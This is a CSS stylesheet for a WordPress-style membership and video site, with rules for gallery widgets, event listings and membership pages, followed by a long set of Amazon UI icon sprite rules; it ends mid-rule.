.img-YoutubeGallery { margin-bottom: 10px; } .li-Widget-YoutubeGallery { margin-bottom: 0 !important; } .footer-socket-area { height: 5px; } .copyright { display: none; } #post-4 .entry-title { display: none; } .widget-title { border-bottom: 2px solid #1e73be; padding-bottom: 0 !important; margin-bottom: 10px !important; } .widget-title span { border-bottom: 0; } #search-form { position: relative; padding-right: 67px; } #search-submit { position: absolute; top: 0; right: 0; } .s.field { width: 100%; } /* CSS Migrated from Jetpack: */ .podcast-audio { width: 100%; } .page .entry-header { display: none; } #TB_window { width: 670px !important; height: 453px !important; } #TB_ajaxContent { padding-top: 15px !important; } .img-YoutubeGallery.chr-size-s-thumb { width: 100% !important; height: 100% !important; } .tribe-event-title { font-size: 20px; line-height: 24px; padding-bottom: 10px; } .tribe-events-list-widget-events { border-bottom: 1px solid #F8F8F8; padding-bottom: 10px; margin-bottom: 10px !important; } .tribe-events-single-section-title { padding-bottom: 0; } .tribe-events-ical { display: none !important; } .tribe-events-meta-group { width: 50% !important; } .tribe-events-cal-links { display: none !important; } .entry-meta .byline, .entry-meta .cat-links { display: none; } .post .entry-title { padding-bottom: 0; text-transform: capitalize; } .entry-content .post { padding-bottom: 0 !important; } h3.title-Widget-YoutubeGallery { font-size: 20px; padding-bottom: 0; padding-top: 0; } .btn-YSG-Widget { display: none; } .img-YoutubeGallery { margin-bottom: 10px; } .li-Widget-YoutubeGallery { margin-bottom: 0 !important; } .footer-socket-area { height: 5px; } .copyright { display: none; } #post-4 .entry-title { display: none; } .widget-title { border-bottom: 2px solid #1e73be; padding-bottom: 0 !important; margin-bottom: 10px !important; } .widget-title span { border-bottom: 0; } #search-form { position: relative; padding-right: 67px; } #search-submit { position: absolute; top: 0; right: 0; } .s.field { width: 100%; } .tribe-events-list-widget .tribe-events-list-widget-events { padding: 0; } .entry-meta .sep { margin-right: 0; } .entry-meta .post-format { display: none; } article.pmpro-no-access { display: none; } article.pmpro-no-access:nth-child(1), article.pmpro-no-access:nth-child(2) { display: block; } .pmpro-no-access .cvm_single_video_player, .pmpro-no-access .entry-meta, .pmpro-no-access .entry-header, .pmpro-no-access .post-featured-image { display: none; } #pmpro_account-membership .pmpro_actionlinks { display:none; } #pmpro_account-membership .pmpro_account-membership-levelname .pmpro_actionlinks { display: block; } #pmpro_account-profile .pmpro_actionlinks { display:none; } #header-text-nav-wrap { padding: 0; } .slides figure { cursor: pointer; } #menu-item-1740, #menu-item-1762, #menu-item-1781 { cursor: default; } .aspect-ratio { position: relative; width: 100%; height: 0; padding-bottom: 57%; } .aspect-ratio .jimmy-video { position: absolute; width: 100%; height: 100%; left: 0; top: 0; } .cc-iframe { float: left; margin: 5px 5px 30px 5px; } .cc-iframe .cc-title { padding: 5px 0; text-align: center; text-transform: capitalize; } /********* Added by Richard below... ************/ /* Makes live shows widget scrollable */ .tribe-events-list-widget .tribe-list-widget { overflow: scroll; height: 120px; } #pmpro_payment_method span { margin: 1rem 0 0 0 !important; display: inline-block; } .border { border: 1px solid darkgray; } .shadow { box-shadow: 3px 5px 12px rgba(0,0,0,0.3); } /* amazon icon */ .a-icon,.a-link-emphasis:after{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_1x-6c462f5dc3bc3e40d0788502814fa7043355712a._V2_.png);-webkit-background-size:400px 900px;background-size:400px 900px;background-repeat:no-repeat;display:inline-block;vertical-align:top}.a-hires .a-icon,.a-hires .a-link-emphasis:after{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_2x-13acd72bb22e0c502de00d0afe21c494871da686._V2_.png)}.a-icon-kindle-unlimited-fr{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_fr_1x-6e8206812d0f46585a3fc111d101d3ce90ff3947._V2_.png);-webkit-background-size:350px 350px;background-size:350px 350px}.a-hires .a-icon-kindle-unlimited-fr{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_fr_2x-5d8b8517fdc738aca4e44ef154658d30291c3993._V2_.png)}.a-domain-jp,.a-icon-domain-jp,.a-icon-jp{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_jp_1x-c3d87199913e2941784e809542105dd61455a79b._V2_.png);-webkit-background-size:350px 350px;background-size:350px 350px}.a-hires .a-domain-jp,.a-hires .a-icon-domain-jp,.a-hires .a-icon-jp{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_jp_2x-11e00174366914d9d552b10d9b309d65ea27e025._V2_.png)}.a-icon-kindle-unlimited-headphones,.a-icon-prime-headphones,.a-icon-prime-jp,.a-icon-prime-jp-nav,.a-icon-prime-wardrobe-badge,.a-icon-prime-wardrobe-logo,.a-prime-jp-logo,.a-prime-jp-nav-logo{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_1x-6c462f5dc3bc3e40d0788502814fa7043355712a._V2_.png);-webkit-background-size:400px 900px;background-size:400px 900px;background-repeat:no-repeat}.a-hires .a-icon-kindle-unlimited-headphones,.a-hires .a-icon-prime-headphones,.a-hires .a-icon-prime-jp,.a-hires .a-icon-prime-jp-nav,.a-hires .a-icon-prime-wardrobe-badge,.a-hires .a-icon-prime-wardrobe-logo,.a-hires .a-prime-jp-logo,.a-hires .a-prime-jp-nav-logo{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_2x-13acd72bb22e0c502de00d0afe21c494871da686._V2_.png)}.a-icon-amazon-app{width:55px;height:55px;background-position:-290px -70px}.a-icon-autorip{width:62px;height:15px;background-position:-205px -339px;vertical-align:baseline;position:relative;bottom:-2px}.a-icon-smile{width:52px;height:21px;background-position:-58px -518px}.a-icon-freetime-sm,.a-icon-freetime.a-icon-small{width:102px;height:10px;background-position:-5px -699px;vertical-align:baseline}.a-icon-freetime,.a-icon-freetime-med{width:142px;height:14px;background-position:-5px -675px;vertical-align:baseline}.a-icon-kindle-unlimited{width:110px;height:14px;background-position:-5px -651px;vertical-align:baseline}.a-icon-kindle-unlimited.a-icon-small{width:80px;height:16px;background-position:-199px -566px}.a-icon-kindle-unlimited-fr{width:86px;height:10px;background-position:-100px -70px;vertical-align:baseline}.a-icon-prime,.a-prime-logo{height:15px;width:54px;background-position:-5px -490px;vertical-align:baseline}.a-icon-prime.a-icon-small,.a-prime-logo.a-icon-small{width:44px;height:12px;background-position:-205px -247px}.a-icon-prime.a-icon-mini,.a-prime-logo.a-icon-mini{width:37px;height:10px;background-position:-137px -651px}.a-icon-text{padding-left:3px;position:relative;bottom:3px}.a-icon-premium-with-text,.a-icon-prime-jp-with-text,.a-icon-prime-with-text{vertical-align:top;font-style:normal;color:#111}.a-icon-premium-with-text.a-icon-small .a-icon-text,.a-icon-prime-jp-with-text.a-icon-small .a-icon-text,.a-icon-prime-with-text.a-icon-small .a-icon-text{font-size:10px;bottom:3px}.a-icon-prime-jp-with-text .a-icon-text,.a-icon-prime-with-text .a-icon-text{bottom:2px}.a-icon-prime-pass{background-position:-210px -633px;height:15px;width:79px}.a-icon-prime-campus{background-position:-100px -629px;height:16px;width:102px;vertical-align:baseline}.a-icon-prime-campus.a-icon-small{background-position:-5px -629px;height:14px;width:88px}.a-icon-fresh{background-position:-190px -552px;height:11px;width:35px;vertical-align:baseline}.a-icon-prime-pantry{background-position:-100px -569px;height:16px;width:74px;vertical-align:baseline}.a-icon-prime-pantry.a-icon-small{background-position:-5px -569px;height:14px;width:68px}.a-icon-pantry{background-position:-300px -630px;width:43px;height:14px}.a-icon-pantry.a-icon-small{background-position:-350px -630px;width:37px;height:11px}.a-icon-prime-fresh{background-position:-100px -549px;height:16px;width:80px;vertical-align:baseline}.a-icon-prime-fresh.a-icon-small{width:72px;height:15px;background-position:-5px -549px}.a-icon-prime-headphones{width:65px;height:15px;background-position:-250px -801px}.a-icon-prime-headphones.a-icon-small{width:52px;height:12px;background-position:-333px -801px}.a-icon-kindle-unlimited-headphones{width:126px;height:14px;background-position:-250px -755px;vertical-align:baseline}.a-icon-kindle-unlimited-headphones.a-icon-small{width:91px;height:10px;background-position:-250px -780px}.a-icon-prime-jp,.a-prime-jp-logo{height:15px;width:54px;background-position:-5px -490px;vertical-align:baseline}.a-icon-prime-jp.a-icon-small,.a-prime-jp-logo.a-icon-small{width:44px;height:12px;background-position:-205px -247px}.a-icon-prime-jp.a-icon-mini,.a-prime-jp-logo.a-icon-mini{width:37px;height:10px;background-position:-137px -651px}.a-button.a-icon-premium,.a-button.a-icon-prime,.a-button.a-icon-prime-jp,.a-button.a-premium-logo,.a-button.a-prime-jp-logo,.a-button.a-prime-logo{position:relative;top:1px}.a-icon-premium-nav,.a-icon-prime-jp-nav,.a-icon-prime-nav,.a-icon-primefresh-nav,.a-premium-nav-logo,.a-prime-jp-nav-logo,.a-prime-nav-logo{position:absolute;left:73px;bottom:0}.a-icon-prime-jp-nav,.a-prime-jp-nav-logo{width:34px;height:12px;background-position:-289px -275px}.a-icon-prime-nav,.a-prime-nav-logo{width:34px;height:12px;background-position:-289px -275px}.a-icon-primefresh-nav{width:63px;height:10px;background-position:-289px -346px}.a-icon-prime-wardrobe-badge-with-text,.a-icon-prime-wardrobe-logo-with-text{vertical-align:top;font-style:normal;color:#767676}.a-icon-prime-wardrobe-badge-with-text.a-icon-small .a-icon-text,.a-icon-prime-wardrobe-logo-with-text.a-icon-small .a-icon-text{font-size:10px;bottom:3px}.a-icon-prime-wardrobe-badge-with-text.a-icon-mini .a-icon-text,.a-icon-prime-wardrobe-logo-with-text.a-icon-mini .a-icon-text{font-size:12px;bottom:2px}.a-icon-prime-wardrobe-logo-with-text .a-icon-text{bottom:0}.a-icon-prime-wardrobe-badge-with-text .a-icon-text{bottom:2px}.a-icon-prime-wardrobe-logo{width:139px;height:19px;background-position:-250px -825px}.a-icon-prime-wardrobe-badge{width:123px;height:16px;background-position:-250px -853px}.a-icon-prime-wardrobe-badge.a-icon-small{background-position:-250px -875px;height:15px;width:111px}.a-icon-prime-wardrobe-badge.a-icon-mini{background-position:-130px -757px;height:14px;width:105px}.a-icon-freetime,.a-icon-freetime-med,.a-icon-freetime-sm{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_1x-6c462f5dc3bc3e40d0788502814fa7043355712a._V2_.png);-webkit-background-size:400px 900px;background-size:400px 900px;background-repeat:no-repeat}.a-hires .a-icon-freetime,.a-hires .a-icon-freetime-med,.a-hires .a-icon-freetime-sm{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_2x-13acd72bb22e0c502de00d0afe21c494871da686._V2_.png)}.a-icon-premium,.a-premium-logo{height:15px;width:54px;background-position:-5px -490px;vertical-align:baseline}.a-icon-premium.a-icon-small,.a-premium-logo.a-icon-small{width:44px;height:12px;background-position:-205px -247px}.a-icon-premium.a-icon-mini,.a-premium-logo.a-icon-mini{width:37px;height:10px;background-position:-137px -651px}.a-icon-premium-nav,.a-premium-nav-logo{width:34px;height:12px;background-position:-289px -275px}.a-hires .a-icon-premium-with-text.a-icon-small .a-icon-text{bottom:3px}.a-addon-badge,.a-icon-addon{background-image:none!important;border-radius:3px 0 0 3px;background-color:#3F6998;font-size:11px;line-height:1.05;padding:4px 5px 4px 6px;color:#fff;font-style:normal;font-weight:700;position:relative;top:1px}.a-addon-badge:after,.a-addon-badge:before,.a-icon-addon:after,.a-icon-addon:before{content:"";position:absolute;right:-5px;border-left-width:0}.a-addon-badge:after,.a-icon-addon:after{top:0;border-style:dashed;border-width:6px;border-color:rgba(255,255,255,0);border-top:6px solid #3F6998;border-bottom-width:0;width:0;height:0;font-size:0;line-height:0;-webkit-transform:translate3d(0,0,0);transform:translate3d(0,0,0);border-top-width:10px}.a-addon-badge:before,.a-icon-addon:before{bottom:0;border-style:dashed;border-width:6px;border-color:rgba(255,255,255,0);border-bottom:6px solid #3F6998;border-top-width:0;width:0;height:0;font-size:0;line-height:0;-webkit-transform:translate3d(0,0,0);transform:translate3d(0,0,0);border-bottom-width:10px}.a-icon-nav-cart,.a-nav-cart{position:relative}.a-domain,.a-icon-domain{height:28px}.a-domain-uk,.a-icon-domain-uk{width:32px;background-position:-5px -200px}.a-domain-ca,.a-icon-domain-ca{width:17px;background-position:-42px -200px}.a-domain-de,.a-icon-domain-de{width:17px;background-position:-64px -200px}.a-domain-it,.a-icon-domain-it{width:13px;background-position:-87px -200px}.a-domain-es,.a-icon-domain-es{width:16px;background-position:-106px -200px}.a-domain-fr,.a-icon-domain-fr{width:12px;background-position:-127px -200px}.a-domain-jp,.a-icon-domain-jp{width:28px;background-position:-145px -200px}.a-domain-br,.a-icon-domain-br{width:42px;background-position:-181px -200px}.a-domain-in,.a-icon-domain-in{width:14px;background-position:-228px -200px}.a-icon-domain-mx{background-position:-5px -327px;width:48px}.a-icon-domain-au{background-position:-58px -327px;width:44px}.a-icon-domain-ru{background-position:-108px -327px;width:16px}.a-icon-domain-nl{background-position:-128px -327px;width:13px}.a-icon-arrow{width:11px;height:15px;background-position:-5px -35px}.a-icon-collapse,.a-icon-expand{width:7px;height:7px;background-position:-366px -86px;position:absolute;top:50%;margin-top:-4px;left:0}.a-no-js .a-icon-expand{background-position:-382px -86px}.a-icon-collapse{background-position:-382px -86px}.a-icon-section-collapse,.a-icon-section-expand{width:15px;height:12px;opacity:.64;position:relative}.a-icon-section-expand{background-position:-5px -59px}.a-icon-section-collapse{background-position:-5px -82px}.a-icon-extender-collapse,.a-icon-extender-expand{position:relative;vertical-align:baseline;margin-right:.385em}.a-icon-star,.a-icon-star-medium,.a-icon-star-mini,.a-icon-star-small{position:relative;vertical-align:text-top}.a-icon-star-medium{width:95px;height:21px;margin-right:1px;top:-2px}.a-star-medium-5{background-position:-5px -396px}.a-star-medium-4{background-position:-24px -396px}.a-star-medium-3{background-position:-43px -396px}.a-star-medium-2{background-position:-62px -396px}.a-star-medium-1{background-position:-81px -396px}.a-star-medium-0{background-position:-100px -396px}.a-star-medium-4-5{background-position:-205px -396px}.a-star-medium-3-5{background-position:-224px -396px}.a-star-medium-2-5{background-position:-243px -396px}.a-star-medium-1-5{background-position:-262px -396px}.a-star-medium-0-5{background-position:-281px -396px}.a-star-brand-medium-5{background-position:-5px -455px}.a-star-brand-medium-4{background-position:-24px -455px}.a-star-brand-medium-3{background-position:-43px -455px}.a-star-brand-medium-2{background-position:-62px -455px}.a-star-brand-medium-1{background-position:-81px -455px}.a-star-brand-medium-0{background-position:-100px -455px}.a-star-brand-medium-4-5{background-position:-205px -455px}.a-star-brand-medium-3-5{background-position:-224px -455px}.a-star-brand-medium-2-5{background-position:-243px -455px}.a-star-brand-medium-1-5{background-position:-262px -455px}.a-star-brand-medium-0-5{background-position:-281px -455px}.a-icon-star-small{width:80px;height:18px}.a-star-small-5{background-position:-5px -368px}.a-star-small-4{background-position:-21px -368px}.a-star-small-3{background-position:-37px -368px}.a-star-small-2{background-position:-53px -368px}.a-star-small-1{background-position:-69px -368px}.a-star-small-0{background-position:-85px -368px}.a-star-small-4-5{background-position:-175px -368px}.a-star-small-3-5{background-position:-191px -368px}.a-star-small-2-5{background-position:-207px -368px}.a-star-small-1-5{background-position:-223px -368px}.a-star-small-0-5{background-position:-239px -368px}.a-star-brand-small-5{background-position:-5px -427px}.a-star-brand-small-4{background-position:-21px -427px}.a-star-brand-small-3{background-position:-37px -427px}.a-star-brand-small-2{background-position:-53px -427px}.a-star-brand-small-1{background-position:-69px -427px}.a-star-brand-small-0{background-position:-85px -427px}.a-star-brand-small-4-5{background-position:-175px -427px}.a-star-brand-small-3-5{background-position:-191px -427px}.a-star-brand-small-2-5{background-position:-207px -427px}.a-star-brand-small-1-5{background-position:-223px -427px}.a-star-brand-small-0-5{background-position:-239px -427px}.a-icon-star-mini{width:60px;height:12px;top:3px}.a-star-mini-5{background-position:-100px -590px}.a-star-mini-4{background-position:-112px -590px}.a-star-mini-3{background-position:-124px -590px}.a-star-mini-2{background-position:-136px -590px}.a-star-mini-1{background-position:-148px -590px}.a-star-mini-0{background-position:-160px -590px}.a-star-mini-4-5{background-position:-230px -590px}.a-star-mini-3-5{background-position:-242px -590px}.a-star-mini-2-5{background-position:-254px -590px}.a-star-mini-1-5{background-position:-266px -590px}.a-star-mini-0-5{background-position:-278px -590px}.a-star-brand-mini-5{background-position:-100px -610px}.a-star-brand-mini-4{background-position:-112px -610px}.a-star-brand-mini-3{background-position:-124px -610px}.a-star-brand-mini-2{background-position:-136px -610px}.a-star-brand-mini-1{background-position:-148px -610px}.a-star-brand-mini-0{background-position:-160px -610px}.a-star-brand-mini-4-5{background-position:-230px -610px}.a-star-brand-mini-3-5{background-position:-242px -610px}.a-star-brand-mini-2-5{background-position:-254px -610px}.a-star-brand-mini-1-5{background-position:-266px -610px}.a-star-brand-mini-0-5{background-position:-278px -610px}a.a-icon-link-emphasis:after,a.a-link-emphasis:after{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_1x-6c462f5dc3bc3e40d0788502814fa7043355712a._V2_.png);-webkit-background-size:400px 900px;background-size:400px 900px;background-repeat:no-repeat;pointer-events:none;content:"";display:block;position:absolute;width:3px;right:1px;top:50%;height:6px;margin-top:-3px;background-position:-346px -86px;vertical-align:top}.a-hires a.a-icon-link-emphasis:after,.a-hires a.a-link-emphasis:after{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_2x-13acd72bb22e0c502de00d0afe21c494871da686._V2_.png)}.a-icon-previous{width:11px;height:15px;background-position:-123px -7px}.a-icon-next{width:11px;height:15px;background-position:-105px -7px}.a-icon-restart{width:15px;height:19px;background-position:-142px -5px}.a-icon-popover{margin:5px 0 0 .385em;vertical-align:text-top;width:7px;height:5px;background-position:-90px -5px;opacity:.6}.a-size-small .a-icon-popover{margin-top:4px}.a-icon-search{opacity:.55;width:13px;height:13px;background-position:-271px -86px}.a-icon-checkmark-inverse{width:15px;height:17px;background-position:-172px -82px;opacity:.6;margin-right:.6em;vertical-align:baseline}.a-icon-share-line,.a-share-line{width:17px;height:17px;background-position:-14px -168px;position:relative;top:1px}.a-icon-share-facebook,.a-share-facebook{width:17px;height:17px;background-position:-36px -168px;position:relative;top:1px}.a-icon-share-twitter,.a-share-twitter{width:18px;height:17px;background-position:-57px -168px;position:relative;top:1px}.a-icon-share-pinterest,.a-share-pinterest{width:17px;height:17px;background-position:-78px -168px;position:relative;top:1px}.a-icon-share-email,.a-share-email{width:19px;height:17px;background-position:-99px -168px;position:relative;top:1px}.a-icon-share-mixi,.a-share-mixi{width:19px;height:17px;background-position:-122px -168px;position:relative;top:1px}.a-icon-share-kaixin001,.a-share-kaixin001{width:17px;height:17px;background-position:-144px -168px;position:relative;top:1px}.a-icon-share-tencent,.a-share-tencent{width:17px;height:17px;background-position:-165px -168px;position:relative;top:1px}.a-icon-share-pengyou,.a-share-pengyou{width:17px;height:17px;background-position:-186px -168px;position:relative;top:1px}.a-icon-share-renren,.a-share-renren{width:17px;height:17px;background-position:-207px -168px;position:relative;top:1px}.a-icon-share-douban,.a-share-douban{width:17px;height:17px;background-position:-228px -168px;position:relative;top:1px}.a-icon-share-qzone,.a-share-qzone{width:17px;height:17px;background-position:-249px -168px;position:relative;top:1px}.a-icon-share-sina,.a-share-sina{width:17px;height:17px;background-position:-269px -168px;position:relative;top:1px}.a-icon-share-wechat,.a-share-wechat{width:17px;height:17px;background-position:-249px -190px;position:relative;top:1px}.a-icon-share-qq,.a-share-qq{width:17px;height:17px;background-position:-270px -190px;position:relative;top:1px}.a-icon-share-sms,.a-share-sms{width:19px;height:19px;background-position:-267px -121px;position:relative;top:1px}.a-icon-share-link,.a-share-link{width:18px;height:19px;background-position:-268px -145px;position:relative;top:1px}.a-icon-share-whatsapp,.a-share-whatsapp{width:17px;height:17px;background-position:-249px -212px;position:relative;top:1px}.a-icon-gridview{width:11px;height:11px;background-position:-162px -5px}.a-icon-listview{width:11px;height:11px;background-position:-178px -5px}.a-icon-text-separator,.a-text-separator{display:inline-block;margin:-2px .67375em 0;width:1px;background-color:#ddd;line-height:0;height:14px;vertical-align:middle}.a-size-small .a-icon-text-separator,.a-size-small .a-text-separator{height:13px}.a-size-mini .a-icon-text-separator,.a-size-mini .a-text-separator{height:12px}.a-icon-row{display:block;line-height:0}.a-icon-row.a-spacing-none{padding-bottom:0}.a-icon-row.a-size-base{line-height:19px}.a-icon-row.a-size-small{line-height:1.5}.a-row{margin-bottom:.5rem;}.a-profile-avatar img{margin-top: 7px;}.a-icon-row .a-row{margin-top:1px}.a-alert-error .a-icon-alert,.a-icon-error{background-position:-248px -35px}.a-alert-info .a-icon-alert,.a-icon-info{background-position:-350px -35px}.a-alert-success .a-icon-alert,.a-icon-success{width:27px;background-position:-318px -35px}.a-alert-warning .a-icon-alert,.a-icon-warning{background-position:-283px -35px}.a-alert-subtle-warning .a-icon-alert{background-position:-356px -168px}.a-icon-error,.a-icon-info,.a-icon-success,.a-icon-warning{height:27px;width:30px}.a-icon-error.a-icon-small,.a-icon-info.a-icon-small,.a-icon-success.a-icon-small,.a-icon-warning.a-icon-small{height:13px;width:14px}.a-alert-inline-error .a-icon-alert,.a-icon-error.a-icon-small{width:5px;background-position:-141px -130px}.a-alert-inline-info .a-icon-alert,.a-icon-info.a-icon-small{width:6px;background-position:-166px -130px}.a-alert-inline-success .a-icon-alert,.a-icon-success.a-icon-small{background-position:-117px -130px}.a-alert-inline-warning .a-icon-alert,.a-icon-warning.a-icon-small{background-position:-148px -86px}.a-alert-inline-subtle-warning .a-icon-alert{background-position:-356px -168px}.a-alert-inline-large-warning .a-icon-alert{background-position:-283px -35px}.a-icon-alt{position:absolute;left:-9999px;top:auto;display:block;width:1px;height:1px;line-height:1px;font-size:1px;overflow:hidden}.a-icon-calendar{background-position:-300px -480px;width:15px;height:15px}.a-icon-calendar-focus{background-position:-300px -500px;width:15px;height:15px}.a-icon-time{background-position:-320px -480px;width:16px;height:16px}.a-icon-time-focus{background-position:-320px -500px;width:16px;height:16px}.a-profile[data-a-type=enthusiast] .a-profile-avatar:after{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_1x-6c462f5dc3bc3e40d0788502814fa7043355712a._V2_.png);-webkit-background-size:400px 900px;background-size:400px 900px;background-repeat:no-repeat;background-position:-293px -664px;width:27px;height:27px}.a-hires .a-profile[data-a-type=enthusiast] .a-profile-avatar:after{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_2x-13acd72bb22e0c502de00d0afe21c494871da686._V2_.png)}.a-profile[data-a-size=small] .a-profile-avatar:after{background-position:-267px -664px;width:17px;height:17px}.a-profile-verified-badge{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_1x-6c462f5dc3bc3e40d0788502814fa7043355712a._V2_.png);-webkit-background-size:400px 900px;background-size:400px 900px;background-repeat:no-repeat;background-position:-345px -480px;padding-left:15px;padding-top:15px;line-height:15px;font-size:0}.a-hires .a-profile-verified-badge{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_2x-13acd72bb22e0c502de00d0afe21c494871da686._V2_.png)}.a-profile[data-a-size=small] .a-profile-verified-badge{background-position:-345px -500px;padding-left:13px;padding-top:13px;line-height:13px}.a-icon-fba-with-text{background-image:none!important;border-radius:2px 0 0 2px;background-color:#3e4650;line-height:1.05;font-size:12px;color:#fff;padding:3px 4px 3px 5px;font-style:normal;position:relative;top:1px;letter-spacing:.08em;-webkit-transform:translate3d(0,0,0);transform:translate3d(0,0,0)}.a-icon-fba-with-text:after{content:"";position:absolute;right:-5px;top:0;border-style:dashed;border-width:6px;border-color:rgba(255,255,255,0);border-top:6px solid #3e4650;border-bottom-width:0;width:0;height:0;font-size:0;line-height:0;-webkit-transform:translate3d(0,0,0);transform:translate3d(0,0,0);border-left-width:0;border-top-width:10px}.a-icon-fba-with-text:before{content:"";position:absolute;right:-5px;bottom:0;border-style:dashed;border-width:6px;border-color:rgba(255,255,255,0);border-bottom:6px solid #3e4650;border-top-width:0;width:0;height:0;font-size:0;line-height:0;-webkit-transform:translate3d(0,0,0);transform:translate3d(0,0,0);border-left-width:0;border-bottom-width:10px}.a-icon-fba{background-position:-160px -350px;height:13px;width:13px}.a-icon-text-fba{font-family:'Arial Narrow',Arial,sans-serif;font-stretch:condensed;padding-left:3px;vertical-align:bottom}.a-icon-wrapper{display:inline-block;vertical-align:top}.a-checkbox-fancy .a-icon.a-icon--checkbox,.a-checkbox-fancy .a-icon.a-icon--radio,.a-radio-fancy .a-icon.a-icon--checkbox,.a-radio-fancy .a-icon.a-icon--radio{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_1x-6c462f5dc3bc3e40d0788502814fa7043355712a._V2_.png);-webkit-background-size:400px 900px;background-size:400px 900px;background-repeat:no-repeat}.a-hires .a-checkbox-fancy .a-icon.a-icon--checkbox,.a-hires .a-checkbox-fancy .a-icon.a-icon--radio,.a-hires .a-radio-fancy .a-icon.a-icon--checkbox,.a-hires .a-radio-fancy .a-icon.a-icon--radio{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_2x-13acd72bb22e0c502de00d0afe21c494871da686._V2_.png)}.a-no-js .a-checkbox-fancy i,.a-no-js .a-checkbox.a-checkbox-fancy i,.a-no-js .a-radio-fancy i,.a-no-js .a-radio.a-radio-fancy i{display:none}.a-no-js .a-checkbox-fancy input,.a-no-js .a-checkbox.a-checkbox-fancy input,.a-no-js .a-radio-fancy input,.a-no-js .a-radio.a-radio-fancy input{position:relative!important;z-index:auto!important;opacity:1}.a-icon-logo,.a-logo{background-position:-5px -130px;height:31px;width:103px}.a-icon-logo-china,.a-logo-china{background-position:-5px -590px;height:38px;width:87px}.a-icon-nav-cart,.a-nav-cart{width:38px;height:26px;background-position:-157px -245px}.a-icon-1click{height:25px;width:25px;background-position:-5px -5px}.a-icon-cart{height:25px;width:25px;background-position:-35px -5px}.a-icon-sns{height:25px;width:25px;background-position:-88px -35px}.a-icon-supplemental{opacity:.64;width:8px;height:11px;background-position:-77px -5px}.a-icon-dropdown{width:10px;height:8px;background-position:-7px -102px}.a-icon-arrow-up{background-position:-354px -5px;width:7px;height:4px;opacity:.64}.a-icon-radio-active,.a-icon-radio-inactive{vertical-align:middle;width:19px;height:19px}.a-icon-radio-inactive{background-position:-6px -294px}.a-icon-radio-inactive.a-icon-radio-disabled{background-position:-360px -560px}.a-icon-radio-inactive:hover{background-position:-54px -294px}.a-icon-radio-active{background-position:-30px -294px}.a-icon-radio-active.a-icon-radio-disabled{background-position:-380px -560px}.a-radio-fancy:hover .a-icon-radio-inactive{background-position:-54px -294px}.a-radio-fancy:hover .a-icon-radio-inactive.a-icon-radio-disabled{background-position:-360px -560px}.a-checkbox-fancy .a-icon-checkbox{vertical-align:middle;height:16px;width:16px}.a-checkbox-fancy:hover .a-icon-checkbox{background-position:-54px -274px}.a-checkbox-fancy .a-icon-checkbox,.a-checkbox-fancy.a-hover-disable:hover .a-icon-checkbox{background-position:-6px -274px}.a-checkbox-fancy :checked+.a-icon-checkbox{background-position:-30px -274px}.a-checkbox-fancy:hover :checked+.a-icon-checkbox{background-position:-30px -274px}.a-checkbox-fancy :disabled+.a-icon-checkbox{background-position:-360px -530px}.a-checkbox-fancy :checked:disabled+.a-icon-checkbox{background-position:-380px -530px}.a-radio-fancy .a-icon-radio{vertical-align:middle;height:17px;width:17px}.a-radio-fancy:hover .a-icon-radio{background-position:-54px -294px}.a-radio-fancy .a-icon-radio,.a-radio-fancy.a-hover-disable:hover .a-icon-radio{background-position:-6px -294px}.a-radio-fancy :checked+.a-icon-radio{background-position:-30px -294px}.a-radio-fancy:hover :checked+.a-icon-radio{background-position:-30px -294px}.a-radio-fancy :disabled+.a-icon-radio{background-position:-360px -560px}.a-radio-fancy :checked:disabled+.a-icon-radio{background-position:-380px -560px}.a-icon-extender-collapse,.a-icon-extender-expand{width:7px;height:9px;background-position:-82px -293px}.a-icon-extender-collapse{background-position:-94px -293px}.a-icon-star{width:80px;height:18px}[class*=a-icon-star]>.a-icon-alt{left:auto;width:100%;height:100%;font-size:inherit;line-height:normal;opacity:0}.a-star-5{background-position:-5px -368px}.a-star-4{background-position:-21px -368px}.a-star-3{background-position:-37px -368px}.a-star-2{background-position:-53px -368px}.a-star-1{background-position:-69px -368px}.a-star-0{background-position:-85px -368px}.a-star-4-5{background-position:-175px -368px}.a-star-3-5{background-position:-191px -368px}.a-star-2-5{background-position:-207px -368px}.a-star-1-5{background-position:-223px -368px}.a-star-0-5{background-position:-239px -368px}.a-star-brand-5{background-position:-5px -427px}.a-star-brand-4{background-position:-21px -427px}.a-star-brand-3{background-position:-37px -427px}.a-star-brand-2{background-position:-53px -427px}.a-star-brand-1{background-position:-69px -427px}.a-star-brand-0{background-position:-85px -427px}.a-star-brand-4-5{background-position:-175px -427px}.a-star-brand-3-5{background-position:-191px -427px}.a-star-brand-2-5{background-position:-207px -427px}.a-star-brand-1-5{background-position:-223px -427px}.a-star-brand-0-5{background-position:-239px -427px}a.a-icon-link-emphasis:hover:after,a.a-link-emphasis:hover:after{background-position:-346px -101px}.a-icon-close{opacity:.64;width:10px;height:9px;background-position:-297px -5px}.a-icon-remove{width:13px;height:12px;background-position:-311px -5px;opacity:.64}.a-icon-row{padding-top:1px;padding-bottom:1px}.a-icon-row:hover 